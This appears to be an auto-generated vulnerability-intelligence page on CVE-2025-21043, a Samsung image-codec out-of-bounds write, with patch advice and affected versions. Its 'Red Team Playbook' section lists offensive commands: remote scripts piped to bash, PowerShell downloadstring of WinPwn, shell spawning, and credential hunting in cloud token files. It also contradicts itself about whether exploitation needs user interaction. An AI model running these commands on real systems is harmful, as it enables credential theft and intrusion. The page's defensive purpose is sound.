CVE-2025-21043
Overview
This vulnerability is an out-of-bounds write occurring in the libimagecodec.quram.so library component of Samsung Mobile Devices. The root cause is improper bounds checking during image codec processing, which allows memory corruption by writing data outside the allocated buffer. This flaw exists in versions of the Android OS on Samsung devices prior to the SMR September 2025 Release 1.
Vulnerability Description
Out-of-bounds write in libimagecodec.quram.so prior to SMR Sep-2025 Release 1 allows remote attackers to execute arbitrary code.
Impact
An unauthenticated remote attacker can exploit this vulnerability by supplying crafted image data to trigger the out-of-bounds write, enabling arbitrary code execution within the context of the affected process. This can lead to full system compromise on vulnerable Samsung Mobile Devices. Exploitation requires user interaction to process the malicious image, but no prior privileges are necessary. The impact includes unauthorized control over device functions, potential data theft, and disruption of device operations.
Solution
Samsung has addressed this vulnerability in the Security Maintenance Release (SMR) September 2025 Release 1 for Android 13.0 on Samsung Mobile Devices. Users should apply the update available via Samsung's official security update portal at https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=09. This update replaces vulnerable components including libimagecodec.quram.so. No additional workarounds are documented; applying the SMR September 2025 patch is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the libimagecodec.quram.so library is characterized by an out-of-bounds write issue that can lead to arbitrary code execution. This flaw arises when the software attempts to write data outside the allocated memory buffer, which can corrupt adjacent memory and potentially allow an attacker to manipulate the execution flow of the application. The affected versions of the Android operating system, particularly those from Samsung, include multiple security maintenance releases, indicating that the vulnerability has persisted across various updates. The severity of this vulnerability is underscored by its high CVSS score of 9.8, which reflects the critical nature of the risk it poses to users.
Attack vectors for this vulnerability are particularly concerning, as they can be exploited remotely without requiring user interaction. An attacker could craft a malicious image file that, when processed by the vulnerable library, triggers the out-of-bounds write condition. This could be achieved through various means, such as phishing emails, malicious websites, or compromised applications that handle image processing. Once the crafted image is executed, the attacker could gain the ability to execute arbitrary code within the context of the application, potentially leading to full system compromise. Given the widespread use of affected devices, the potential for exploitation is significant, making this a critical issue for both individual users and organizations.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on Samsung devices running the affected versions of Android. Successful exploitation could lead to unauthorized access to sensitive data, system integrity breaches, and significant operational disruptions. For organizations, the financial implications could be severe, including costs associated with incident response, legal liabilities, and reputational damage. Furthermore, the risk of data breaches could lead to regulatory scrutiny and compliance issues, especially in industries that are heavily regulated. The pervasive nature of mobile devices in corporate environments amplifies the potential for widespread exploitation, making it imperative for organizations to prioritize mitigation strategies.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating devices to the latest security maintenance releases is crucial, as these updates often contain patches for known vulnerabilities. Implementing application whitelisting can help prevent the execution of unauthorized applications that may exploit this flaw. Additionally, employing intrusion detection systems (IDS) can assist in identifying anomalous behavior associated with exploitation attempts. User education is also vital; training employees to recognize phishing attempts and malicious links can reduce the likelihood of successful exploitation. Finally, organizations should consider conducting regular security assessments and penetration testing to identify and remediate vulnerabilities before they can be exploited.
In conclusion, the out-of-bounds write vulnerability in the libimagecodec.quram.so library poses a significant threat to users of affected Samsung Android devices. The potential for remote exploitation, coupled with the severe impact on business operations and data security, necessitates immediate attention from both individuals and organizations. By implementing robust detection and mitigation strategies, it is possible to reduce the risk associated with this vulnerability and protect sensitive information from malicious actors.
The CVSS score adjustment for CVE-2025-21043 from 9.8 to 8.8 reflects a refined understanding of the vulnerability’s impact and exploitability based on recent assessments. This recalibration indicates that while the vulnerability remains critical, the likelihood or ease of remote code execution exploitation may be somewhat lower than initially estimated. CSURFACE threat intelligence notes that despite this downgrade, the vulnerability continues to rank high in severity, supported by its inclusion in the KEV catalog and a stable EPSS score positioned near the 90th percentile. Our telemetry shows no emergence of new exploit techniques or ransomware group activity leveraging this flaw, suggesting that active exploitation remains limited or controlled at this time. For defenders, this means prioritization remains essential, but the immediate threat environment has not escalated, allowing for measured response planning. The updated risk profile underscores the importance of continued monitoring and patch management without indicating an urgent spike in exploitation attempts.
Update 2 — June 09, 2026
The CVSS score for CVE-2025-21043 has been revised upward from 8.8 to 9.8, reflecting a reassessment of the vulnerability’s potential impact and exploitability. This adjustment coincides with the vulnerability’s addition to the KEV catalog, signaling increased recognition of its criticality within the security community. While our telemetry continues to show no emergence of active exploitation campaigns or ransomware groups leveraging this flaw, the heightened severity rating underscores a greater theoretical risk of remote code execution on affected Samsung mobile devices. For defenders, this change elevates the priority of patch management and monitoring efforts, as the vulnerability now aligns with the highest severity tier, indicating that successful exploitation could have devastating consequences. The stable EPSS score near the 90th percentile suggests that, although exploitation remains limited, the window for potential attacks is significant and warrants sustained vigilance.
Affected Products (103)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-aug-2022-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-aug-2023-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-aug-2024-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-aug-2025-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-dec-2021-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-dec-2022-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-dec-2023-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-dec-2024-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-feb-2022-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-feb-2023-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-feb-2024-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-feb-2025-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-jan-2022-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-jan-2023-r1:*:*:*:*:*:*
|
|
|
Samsung | Android | 13.0 |
cpe:2.3:o:samsung:android:13.0:smr-jan-2024-r1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-21043 |
| security.samsungmobile.com |
GitHub CVE
|
https://security.samsungmobile.com/securityUpdate.smsb?year=2025&month=09 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-21043 |